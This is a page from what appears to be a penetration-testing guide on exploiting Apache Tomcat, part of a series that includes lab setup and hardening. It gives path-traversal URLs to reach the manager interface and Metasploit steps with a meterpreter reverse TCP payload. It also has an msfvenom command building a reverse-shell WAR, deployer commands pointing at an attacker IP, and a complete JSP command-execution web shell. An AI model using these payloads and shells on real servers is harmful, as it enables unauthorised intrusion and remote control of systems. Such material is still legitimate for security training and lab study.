HomeGitHubPortfolioTwitter/XMediumCont@ct

Exploitation

Topics

  1. Lab Setup & Configuration

  2. Enumeration

  3. Exploitation

  4. Mitigation & Hardening

Common Vulnerabilities

  1. Password Backtrace Disclosure Visiting /auth.jsp might reveal passwords in backtraces.

  2. Double URL Encoding Vulnerabilities like CVE-2007-1860 allow management interface access via:

    pathTomcat/%252E%252E/manager/html

  3. Insecure Example Scripts Apache Tomcat versions 4.x–7.x include examples susceptible to XSS or information disclosure. Examples:

    • /examples/jsp/num/numguess.jsp

    • /examples/servlet/HelloWorldExample Check and restrict access to these paths.

  4. Path Traversal Exploit path traversal with:

    <tomcat_target_ip>/lalala/..;/manager/html

    or

    http://<tomcat_target_ip>/;param=value/manager/html

Using Metasploit Framework

Leverage the tomcat_mgr_upload exploit available in Metasploit for Tomcat file upload vulnerabilities. Launch Metasploit and execute the following commands:

msfconsole -q
search tomcat_mgr_upload
use 3
set rhosts <tomcat_target_ip>
set rport 8080
set httpusername admin
set httppassword password
set payload linux/x86/meterpreter_reverse_tcp
exploit

After exploitation, a reverse shell is obtained, allowing command execution via the meterpreter shell.

Remote Code Execution (RCE)

If you gain access to the /manager/html interface, you can upload and deploy a .war file to achieve RCE.

  • Example:

    curl --upload-file shell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/shell"

Metasploit can automate this:

use exploit/multi/http/tomcat_mgr_upload

To create a reverse shell WAR file:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o shell.war

Other Methods

  1. TomcatWarDeployer Deploy shells or bind shells via:

    ./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/

  2. Clusterd Automate testing:

    clusterd.py -i <attacker_machine> -a tomcat -v 5.5 --gen-payload <tomcat_target_ip>:4444 --deploy shell.war

  3. Manual Web Shell Example JSP for command execution:

    <FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<% 
   String cmd = request.getParameter("cmd");
   String output = "";
   if(cmd != null) {
      Process p = Runtime.getRuntime().exec(cmd,null,null);
      BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
      while((s = sI.readLine()) != null) { output += s+"</br>"; }
   } 
%>
<pre><%=output %></pre>

    Package it into a WAR file and upload it.

Other Tools

PreviousEnumerationNextMitigation & Hardening

Last updated